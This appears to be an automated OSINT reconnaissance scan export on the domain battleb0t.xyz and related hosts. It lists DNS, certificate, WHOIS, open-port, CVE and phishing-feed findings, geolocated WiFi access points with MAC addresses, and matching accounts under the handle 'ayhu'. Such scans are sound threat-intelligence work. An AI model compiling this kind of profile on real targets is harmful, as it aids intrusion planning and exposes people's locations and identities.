| 2023-05-12 02:44:30 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', 
u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': 
|
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | risk.ru (Category: hobby)
https://risk.ru/people/login | login |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D7:2D) | 32.8608, -79.9746 |
| 2023-05-12 02:44:14 | IPv6 Address | No | DNS Resolver | 16 | 0 | 1 | 0 | None | 2606:4700:3031::6815:6a6 | ayhu.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Andrea Schwartz Gallery 5G (Net ID: 00:01:9F:3D:4F:6C) | 37.780462,-122.390564 |
| 2023-05-12 03:15:36 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | Iran | 87.248.157.102 |
| 2023-05-12 02:45:03 | Country | No | Country Name Extractor | 0 | 0 | 2 | 0 | None | Russia | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.73): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5853301ea41251-ORD
Content-Encoding: gzip
| 172.67.168.252 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1232 (Net ID: 00:01:03:7C:2D:17) | 52.3759, 4.8975 |
| 2023-05-12 02:44:30 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Font Awesome | pics.battleb0t.xyz |
| 2023-05-12 02:45:34 | Email Gateway (DNS MX Records) | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | route2.mx.cloudflare.net | battleb0t.xyz |
| 2023-05-12 03:41:58 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | domixo-hosting.de | domixo-hosting.de |
| 2023-05-12 02:50:28 | Raw Data from RIRs | No | GLEIF | 0 | 0 | 3 | 0 | None | [{u'relationships': {u'lei-records': {u'data': {u'type': u'lei-records', u'id': u'5493005GJOH8HLL11157'}, u'links': {u'related': u'https://api.gleif.org/api/v1/lei-records/5493005GJOH8HLL11157'}}}, u'attributes': {u'highlighting': u'<b>Go</b> <b>Daddy</b> Operating Company, <b>LLC</b>', u'value': u'Go Daddy Operating Company, LLC'}, u'type': u'autocompletions'}] | Go Daddy, LLC |
| 2023-05-12 02:44:21 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3037::6815:470e | nwapi2.battleb0t.xyz |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00x44.github.io | 185.199.111.153 |
| 2023-05-12 02:44:09 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
0d:40:8d:d9:7c:a1:bd:4c:0d:06:c5:3f:c3:e9:2e:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Apr 11 04:54:50 2023 GMT
Not After : Jul 10 04:54:49 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BA:51:29:0E:2E:1D:B8:E3:1A:BA:7C:11:8D:3C:69:BB:27:B0:51:A7
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/TQXQbT5nMS4
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/PX7fR59yV-s.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| ayhu.xyz |
| 2023-05-12 03:09:31 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | james-gamboa.github.io |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.23): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-8F90 (Net ID: 84:94:8C:33:8F:98) | 37.751, -97.822 |
| 2023-05-12 03:41:52 | Open TCP Port Banner | No | Censys | 0 | 1 | 3 | 0 | None | SMB SMB 2.1 | 45.131.109.53 |
| 2023-05-12 02:46:00 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Chicago, Illinois, 60666, United States, North America | 172.67.168.252 |
| 2023-05-12 02:54:13 | Web Content Type | No | Web Spider | 0 | 0 | 3 | 0 | None | application/javascript;charset=utf-8 | https://battleb0t.xyz/main.built.js |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | downtown5 (Net ID: 00:01:E3:E9:56:90) | 50.1188, 8.6843 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | HubPages (Category: blog)
https://hubpages.com/@ayhu | ayhu |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet8FBA (Net ID: 00:01:36:5C:8F:B8) | 37.7642, -122.3993 |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00ihsan.github.io]
https://www.openphish.com/feed.txt | 00ihsan.github.io |
| 2023-05-12 03:08:45 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.211 | 104.196.30.220 |
| 2023-05-12 02:44:31 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3030::ac43:a8fc | panel.battleb0t.xyz |
| 2023-05-12 02:54:54 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 2a06:98c1:3121::1 |
| 2023-05-12 03:09:40 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 119.48.229.35.bc.googleusercontent.com | 35.229.48.119 |
| 2023-05-12 03:00:57 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00yongshiwangzi.github.io | 185.199.111.153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | APC (Net ID: 00:09:5B:4F:F1:CA) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:44:36 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:2c:84:3a:08:10:23:75:f2:8a:d5:a0:cb:cc:f6:da:14:6e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:32:07 2022 GMT
Not After : Mar 27 01:32:06 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 27 02:32:07.311 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 27 02:32:07.904 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 02:45:04 | Country | No | Country Name Extractor | 0 | 0 | 2 | 0 | None | United States | github.com |
| 2023-05-12 03:18:53 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Rotated 180 @ 18} | https://funny.battleb0t.xyz/images/random_3.jpg |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | FRBEACH (Net ID: 00:02:2D:8A:07:45) | 34.0544, -118.244 |
| 2023-05-12 03:00:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.50): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | apple network 3a656b (Net ID: 00:02:2D:05:9A:3A) | 34.0544, -118.244 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.26): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes128-gcm@openssh.com | |
| 2023-05-12 02:44:14 | Co-Hosted Site | No | SSL Certificate Analyzer | 3 | 1 | 2 | 0 | None | netlify.app | pics.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F4:1C:9A) | 37.780462,-122.390564 |
| 2023-05-12 03:24:21 | HTTP Status Code | No | Web Spider | 0 | 0 | 3 | 0 | None | 403 | https://ayhu.xyz/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | omniblock (Net ID: 00:09:5B:E9:6B:D6) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:15:36 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | Germany | 46.101.229.70 |
| 2023-05-12 02:46:50 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 3 | 0 | None | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app | 34.148.97.127 |
| 2023-05-12 02:45:58 | Physical Location | No | AbstractAPI | 1 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60313, Germany, Europe | 64.226.81.43 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00yongshiwangzi.github.io]
https://www.openphish.com/feed.txt | 00yongshiwangzi.github.io |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2053 | 188.114.96.1 |
| 2023-05-12 03:09:24 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 3 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | 64.226.81.43 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.173): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:08 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.110.133:80 | 185.199.110.0/24 |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | cloudflare.com |
| 2023-05-12 02:54:16 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://oldfluid.battleb0t.xyz/./script.js | https://oldfluid.battleb0t.xyz/ |
| 2023-05-12 02:47:30 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 104.21.6.166:80 | 104.21.6.166 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.255): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:56 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'185.199.111.153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'185.199.108.0/22', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 37.7809, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94142', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.4245, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 185.199.111.153 |
| 2023-05-12 03:23:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.4:443 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Omni (Net ID: 00:02:2D:17:C6:E0) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:44:21 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | United States | 185.199.110.153 |
| 2023-05-12 02:54:19 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | https://fluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 03:08:38 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 185.199.108.154 | 185.199.108.153 |
| 2023-05-12 03:23:44 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.17:8443 | 188.114.96.0/24 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://pics.battleb0t.xyz | pics.battleb0t.xyz |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Omni (Net ID: 00:02:2D:17:C6:E0) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:55:08 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:74:c7:69:09:be:bf:85:53:83:95:0e:84:5e:23:6b:8f:95
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 17:04:53 2023 GMT
Not After : Jun 25 17:04:52 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1F:80:B0:A7:B9:49:16:0F:27:7B:7C:B9:F5:38:B5:3D:C9:3C:2F:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 27 18:04:53.353 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 27 18:04:53.360 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 02:44:22 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.108.153 |
| 2023-05-12 03:03:19 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-0-256.github.io |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1200 (Net ID: 00:01:03:7C:0A:E5) | 41.8781, -87.6298 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Internet Archive Account (Category: misc)
https://archive.org/details/@ayhu | ayhu |
| 2023-05-12 03:23:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.5:8080 | 188.114.96.0/24 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pinterest (Category: social)
https://www.pinterest.com/ayhu/ | ayhu |
| 2023-05-12 02:46:30 | Netblock Membership | No | RIPE | 1 | 0 | 3 | 0 | None | 104.21.64.0/20 | 104.21.71.14 |
| 2023-05-12 02:54:10 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:4700:3031::6815:6a6:443 | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:31:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com | Domain Name: NETCRAFT.COM
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-12-07T10:43:50Z
Creation Date: 1994-10-18T04:00:00Z
